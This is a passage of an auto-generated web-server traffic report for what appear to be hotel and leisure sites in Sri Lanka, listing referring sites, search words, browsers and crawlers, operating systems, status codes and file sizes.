<tr><td class="R">313</td><td class="xl">https://www.facebook.com/</td></tr>
<tr><td class="R">228</td><td class="xl">http://thefirsboutiques.com/</td></tr>
<tr><td class="R">221</td><td class="xl">http://fsalk.com/</td></tr>
<tr><td class="R">165</td><td class="xl">http://www.fsalk.com/</td></tr>
<tr><td class="R">152</td><td class="xl">https://www.thefirsnuwaraeliya.com/</td></tr>
<tr><td class="R">148</td><td class="xl">http://freudenbergleisure.com/</td></tr>
<tr><td class="R">145</td><td class="xl">https://www.bing.com/</td></tr>
<tr><td class="R">142</td><td class="xl">http://www.google.com/</td></tr>
<tr><td class="R">138</td><td class="xl">https://www.google.co.in/</td></tr>
<tr><td class="R">117</td><td class="xl">https://uptime.com/</td></tr>
<tr><td class="R">116</td><td class="xl">https://thefirsnuwaraeliya.com/</td></tr>
<tr><td class="R">114</td><td class="xl">http://freudenbergleisure.lk/</td></tr>
<tr><td class="R">110</td><td class="xl">http://www.freudenbergleisure.lk/</td></tr>
<tr><td class="R">96</td><td class="xl">https://freudenbergleisure.lk/</td></tr>
<tr><td class="R">95</td><td class="xl">https://fsalk.com/</td></tr>
<tr><td class="R">94</td><td class="xl">http://firs.freudenbergleisure.com/</td></tr>
<tr><td class="R">87</td><td class="xl">http://www.fsaleisure.com/</td></tr>
<tr><td class="R">86</td><td class="xl">https://www.freudenbergleisure.lk/</td></tr>
<tr><td class="R">77</td><td class="xl">http://fsaleisure.com/</td></tr>
<tr><td class="R">66</td><td class="xl">https://www.fsalk.com/</td></tr>
<tr><td class="R">1948</td><td class="xl">[not listed: 412 sites]</td></tr>
</tbody></table>
</div><div class="searchw"><h2><a name="searchw" id="searchw">Search Word Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Search Word Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./searchw.png" alt="" /></p>
<p class="whatinc">
Listing query words, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">search term</th></tr></thead>
<tbody><tr><td class="R">3</td><td class="xl">nuwara</td></tr>
<tr><td class="R">3</td><td class="xl">eliya</td></tr>
<tr><td class="R">2</td><td class="xl">firs</td></tr>
<tr><td class="R">1</td><td class="xl">the</td></tr>
<tr><td class="R">1</td><td class="xl">lucksery</td></tr>
<tr><td class="R">1</td><td class="xl">banglow</td></tr>
<tr><td class="R">1</td><td class="xl">church</td></tr>
<tr><td class="R">1</td><td class="xl">welisara</td></tr>
<tr><td class="R">1</td><td class="xl">bungalows</td></tr>
<tr><td class="R">1</td><td class="xl">semi</td></tr>
<tr><td class="R">1</td><td class="xl">in</td></tr>
<tr><td class="R">1</td><td class="xl">hotels</td></tr>
</tbody></table>
</div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./browrep.png" alt="" /></p>
<p class="whatinc">
Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead>
<tbody><tr><td class="R">5995</td><td class="P">1745</td><td class="xl">Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)</td></tr>
<tr><td class="R">3562</td><td class="P">1453</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)</td></tr>
<tr><td class="R">2330</td><td class="P">1037</td><td class="xl">Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)</td></tr>
<tr><td class="R">1108</td><td class="P">777</td><td class="xl">Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)</td></tr>
<tr><td class="R">685</td><td class="P">685</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1</td></tr>
<tr><td class="R">789</td><td class="P">605</td><td class="xl">Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)</td></tr>
<tr><td class="R">388</td><td class="P">388</td><td class="xl">Apache-HttpClient/4.5.2 (Java/1.8.0_151)</td></tr>
<tr><td class="R">1409</td><td class="P">385</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36</td></tr>
<tr><td class="R">5493</td><td class="P">376</td><td class="xl">Mozilla/5.0 (X11; Datanyze; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36</td></tr>
<tr><td class="R">5278</td><td class="P">362</td><td class="xl">Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online) AppleWebKit/534.34</td></tr>
<tr><td class="R">435</td><td class="P">358</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon</td></tr>
<tr><td class="R">350</td><td class="P">348</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider</td></tr>
<tr><td class="R">337</td><td class="P">337</td><td class="xl">Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)</td></tr>
<tr><td class="R">363</td><td class="P">332</td><td class="xl">ZoominfoBot (zoominfobot at zoominfo dot com)</td></tr>
<tr><td class="R">331</td><td class="P">312</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36</td></tr>
<tr><td class="R">340</td><td class="P">291</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36</td></tr>
<tr><td class="R">351</td><td class="P">260</td><td class="xl">Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)</td></tr>
<tr><td class="R">593</td><td class="P">210</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36</td></tr>
<tr><td class="R">236</td><td class="P">202</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36</td></tr>
<tr><td class="R">788</td><td class="P">196</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</td></tr>
<tr><td class="R">174</td><td class="P">174</td><td class="xl">Ruby</td></tr>
<tr><td class="R">626</td><td class="P">162</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36</td></tr>
<tr><td class="R">137</td><td class="P">137</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36</td></tr>
<tr><td class="R">214</td><td class="P">137</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko</td></tr>
<tr><td class="R">136</td><td class="P">136</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr>
<tr><td class="R">129</td><td class="P">129</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36</td></tr>
<tr><td class="R">589</td><td class="P">128</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36</td></tr>
<tr><td class="R">410</td><td class="P">127</td><td class="xl">Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)</td></tr>
<tr><td class="R">377</td><td class="P">126</td><td class="xl">Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)</td></tr>
<tr><td class="R">965</td><td class="P">126</td><td class="xl">Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko; googleweblight) Chrome/38.0.1025.166 Mobile Safari/535.19</td></tr>
<tr><td class="R">125</td><td class="P">125</td><td class="xl">Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)</td></tr>
<tr><td class="R">125</td><td class="P">125</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36</td></tr>
<tr><td class="R">120</td><td class="P">120</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36</td></tr>
<tr><td class="R">121</td><td class="P">119</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0</td></tr>
<tr><td class="R">458</td><td class="P">118</td><td class="xl">Mozilla/5.0 (iPad; CPU OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1</td></tr>
<tr><td class="R">108</td><td class="P">108</td><td class="xl">Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1</td></tr>
<tr><td class="R">166</td><td class="P">108</td><td class="xl">Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)</td></tr>
<tr><td class="R">107</td><td class="P">107</td><td class="xl">Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online)</td></tr>
<tr><td class="R">809</td><td class="P">106</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko</td></tr>
<tr><td class="R">246</td><td class="P">104</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36</td></tr>
<tr><td class="R">50777</td><td class="P">14163</td><td class="xl">[not listed: 2,650 browsers]</td></tr>
</tbody></table>
</div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./browsum.png" alt="" /></p>
<p class="whatinc">
Listing the top 20 browsers by the number of requests for pages, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead>
<tbody><tr><td class="N">1</td><td class="R">51316</td><td class="P">13901</td><td class="xl">Safari</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">41721</td><td class="P">11832</td><td class="xl">&nbsp;&nbsp;Safari/537</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1266</td><td class="P">813</td><td class="xl">&nbsp;&nbsp;Safari/602</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">4474</td><td class="P">531</td><td class="xl">&nbsp;&nbsp;Safari/604</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">990</td><td class="P">150</td><td class="xl">&nbsp;&nbsp;Safari/535</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1183</td><td class="P">138</td><td class="xl">&nbsp;&nbsp;Safari/605</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">404</td><td class="P">109</td><td class="xl">&nbsp;&nbsp;Safari/600</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">203</td><td class="P">104</td><td class="xl">&nbsp;&nbsp;Safari/534</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">195</td><td class="P">93</td><td class="xl">&nbsp;&nbsp;Safari/601</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">239</td><td class="P">32</td><td class="xl">&nbsp;&nbsp;Safari/603</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">35</td><td class="P">29</td><td class="xl">&nbsp;&nbsp;Safari/533</td></tr>
<tr><td class="N">2</td><td class="R">20388</td><td class="P">6457</td><td class="xl">Netscape (compatible)</td></tr>
<tr><td class="N">3</td><td class="R">6801</td><td class="P">2986</td><td class="xl">Firefox</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">740</td><td class="P">740</td><td class="xl">&nbsp;&nbsp;Firefox/42</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">696</td><td class="P">690</td><td class="xl">&nbsp;&nbsp;Firefox/40</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">241</td><td class="P">238</td><td class="xl">&nbsp;&nbsp;Firefox/45</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">162</td><td class="P">146</td><td class="xl">&nbsp;&nbsp;Firefox/3</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">522</td><td class="P">99</td><td class="xl">&nbsp;&nbsp;Firefox/59</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">716</td><td class="P">92</td><td class="xl">&nbsp;&nbsp;Firefox/50</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">106</td><td class="P">87</td><td class="xl">&nbsp;&nbsp;Firefox/56</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">109</td><td class="P">87</td><td class="xl">&nbsp;&nbsp;Firefox/27</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">498</td><td class="P">67</td><td class="xl">&nbsp;&nbsp;Firefox/61</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">205</td><td class="P">67</td><td class="xl">&nbsp;&nbsp;Firefox/62</td></tr>
<tr><td class="N">4</td><td class="R">1966</td><td class="P">1209</td><td class="xl">MSIE</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">869</td><td class="P">726</td><td class="xl">&nbsp;&nbsp;MSIE/6</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">218</td><td class="P">146</td><td class="xl">&nbsp;&nbsp;MSIE/7</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">374</td><td class="P">131</td><td class="xl">&nbsp;&nbsp;MSIE/9</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">110</td><td class="P">107</td><td class="xl">&nbsp;&nbsp;MSIE/5</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">178</td><td class="P">53</td><td class="xl">&nbsp;&nbsp;MSIE/8</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">186</td><td class="P">15</td><td class="xl">&nbsp;&nbsp;MSIE/10</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">12</td><td class="P">12</td><td class="xl">&nbsp;&nbsp;MSIE/4</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">2</td><td class="P">2</td><td class="xl">&nbsp;&nbsp;MSIE/3</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;MSIE/2</td></tr>
<tr><td class="N">5</td><td class="R">547</td><td class="P">541</td><td class="xl">Apache-HttpClient</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">547</td><td class="P">541</td><td class="xl">&nbsp;&nbsp;Apache-HttpClient/4</td></tr>
<tr><td class="N">6</td><td class="R">3872</td><td class="P">483</td><td class="xl">Mozilla</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">9</td><td class="P">8</td><td class="xl">&nbsp;&nbsp;Mozilla/0</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">3</td><td class="P">3</td><td class="xl">&nbsp;&nbsp;Mozilla/1</td></tr>
<tr><td class="N">7</td><td class="R">363</td><td class="P">332</td><td class="xl">ZoominfoBot (zoominfobot at zoominfo dot com)</td></tr>
<tr><td class="N">8</td><td class="R">351</td><td class="P">260</td><td class="xl">Sogou web spider</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">351</td><td class="P">260</td><td class="xl">&nbsp;&nbsp;Sogou web spider/4</td></tr>
<tr><td class="N">9</td><td class="R">425</td><td class="P">248</td><td class="xl">Opera</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">259</td><td class="P">90</td><td class="xl">&nbsp;&nbsp;Opera/9</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">97</td><td class="P">89</td><td class="xl">&nbsp;&nbsp;Opera/8</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">52</td><td class="P">52</td><td class="xl">&nbsp;&nbsp;Opera/7</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">16</td><td class="P">16</td><td class="xl">&nbsp;&nbsp;Opera/6</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;Opera/10</td></tr>
<tr><td class="N">10</td><td class="R">174</td><td class="P">174</td><td class="xl">Ruby</td></tr>
<tr><td class="N">11</td><td class="R">380</td><td class="P">154</td><td class="xl">python-requests</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">380</td><td class="P">154</td><td class="xl">&nbsp;&nbsp;python-requests/2</td></tr>
<tr><td class="N">12</td><td class="R">92</td><td class="P">87</td><td class="xl">Go-http-client</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">67</td><td class="P">67</td><td class="xl">&nbsp;&nbsp;Go-http-client/1</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">25</td><td class="P">20</td><td class="xl">&nbsp;&nbsp;Go-http-client/2</td></tr>
<tr><td class="N">13</td><td class="R">60</td><td class="P">60</td><td class="xl">Netscape</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">40</td><td class="P">40</td><td class="xl">&nbsp;&nbsp;Netscape/4</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">13</td><td class="P">13</td><td class="xl">&nbsp;&nbsp;Netscape/5</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">4</td><td class="P">4</td><td class="xl">&nbsp;&nbsp;Netscape/3</td></tr>
<tr><td class="N">14</td><td class="R">157</td><td class="P">42</td><td class="xl">MauiBot (crawler.feedback+wc@gmail.com)</td></tr>
<tr><td class="N">15</td><td class="R">84</td><td class="P">39</td><td class="xl">ia_archiver</td></tr>
<tr><td class="N">16</td><td class="R">174</td><td class="P">35</td><td class="xl">CCBot</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">174</td><td class="P">35</td><td class="xl">&nbsp;&nbsp;CCBot/2</td></tr>
<tr><td class="N">17</td><td class="R">28</td><td class="P">28</td><td class="xl">OrgProbe</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">28</td><td class="P">28</td><td class="xl">&nbsp;&nbsp;OrgProbe/2</td></tr>
<tr><td class="N">18</td><td class="R">39</td><td class="P">23</td><td class="xl">WhatsApp</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">32</td><td class="P">18</td><td class="xl">&nbsp;&nbsp;WhatsApp/2</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">7</td><td class="P">5</td><td class="xl">&nbsp;&nbsp;WhatsApp/0</td></tr>
<tr><td class="N">19</td><td class="R">27</td><td class="P">23</td><td class="xl">curl</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">27</td><td class="P">23</td><td class="xl">&nbsp;&nbsp;curl/7</td></tr>
<tr><td class="N">20</td><td class="R">60</td><td class="P">15</td><td class="xl">facebookexternalhit</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">60</td><td class="P">15</td><td class="xl">&nbsp;&nbsp;facebookexternalhit/1</td></tr>
<tr><td class="N">&nbsp;</td><td class="R">776</td><td class="P">247</td><td class="xl">[not listed: 77 browsers]</td></tr>
</tbody></table>
</div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./os.png" alt="" /></p>
<p class="whatinc">
Listing operating systems, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead>
<tbody><tr><td class="N">1</td><td class="R">33143</td><td class="P">10986</td><td class="xl">Windows</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">17146</td><td class="P">5583</td><td class="xl">&nbsp;&nbsp;Unknown Windows</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">14270</td><td class="P">4015</td><td class="xl">&nbsp;&nbsp;Windows NT</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1356</td><td class="P">1028</td><td class="xl">&nbsp;&nbsp;Windows XP</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">185</td><td class="P">174</td><td class="xl">&nbsp;&nbsp;Windows 2000</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">87</td><td class="P">87</td><td class="xl">&nbsp;&nbsp;Windows Server 2003</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">50</td><td class="P">50</td><td class="xl">&nbsp;&nbsp;Windows 95</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">23</td><td class="P">23</td><td class="xl">&nbsp;&nbsp;Windows 98</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">17</td><td class="P">17</td><td class="xl">&nbsp;&nbsp;Windows ME</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">7</td><td class="P">7</td><td class="xl">&nbsp;&nbsp;Windows 3.1</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">2</td><td class="P">2</td><td class="xl">&nbsp;&nbsp;Windows CE</td></tr>
<tr><td class="N">2</td><td class="R">21368</td><td class="P">6994</td><td class="xl">OS unknown</td></tr>
<tr><td class="N">3</td><td class="R">18412</td><td class="P">4555</td><td class="xl">Unix</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">18394</td><td class="P">4549</td><td class="xl">&nbsp;&nbsp;Linux</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">16</td><td class="P">4</td><td class="xl">&nbsp;&nbsp;Other Unix</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">2</td><td class="P">2</td><td class="xl">&nbsp;&nbsp;BSD</td></tr>
<tr><td class="N">4</td><td class="R">11309</td><td class="P">2902</td><td class="xl">Macintosh</td></tr>
<tr><td class="N">5</td><td class="R">3848</td><td class="P">1907</td><td class="xl">Known robots</td></tr>
</tbody></table>
</div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./code.png" alt="" /></p>
<p class="whatinc">
Listing status codes, sorted numerically.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead>
<tbody><tr><td class="R">84545</td><td class="xl">200 OK</td></tr>
<tr><td class="R">3</td><td class="xl">206 Partial content</td></tr>
<tr><td class="R">490</td><td class="xl">301 Document moved permanently</td></tr>
<tr><td class="R">39960</td><td class="xl">302 Document found elsewhere</td></tr>
<tr><td class="R">4125</td><td class="xl">304 Not modified since last retrieval</td></tr>
</tbody></table>
</div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./size.png" alt="" /></p>
<table>
<thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead>
<tbody><tr><td class="x">          0</td><td class="R">4467</td><td class="b">&nbsp;</td></tr>
<tr><td class="x">   1B-  10B</td><td class="R">4</td><td class="b">&nbsp;</td></tr>
<tr><td class="x">  11B- 100B</td><td class="R">194</td><td class="b">&nbsp;</td></tr>
<tr><td class="x"> 101B-  1kB</td><td class="R">3899</td><td class="b"> 0.07%</td></tr>
<tr><td class="x">  1kB- 10kB</td><td class="R">17036</td><td class="b"> 2.29%</td></tr>
<tr><td class="x"> 10kB-100kB</td><td class="R">59957</td><td class="b">66.72%</td></tr>
<tr><td class="x">100kB-  1MB</td><td class="R">3113</td><td class="b">30.76%</td></tr>
<tr><td class="x">  1MB- 10MB</td><td class="R">3</td><td class="b"> 0.15%</td></tr>
</tbody></table>
</div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./type.png" alt="" /></p>
<p class="whatinc">
Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead>
<tbody><tr><td class="R">19497</td><td class="b">32.24%</td><td class="xl">.js   [JavaScript code]</td></tr>
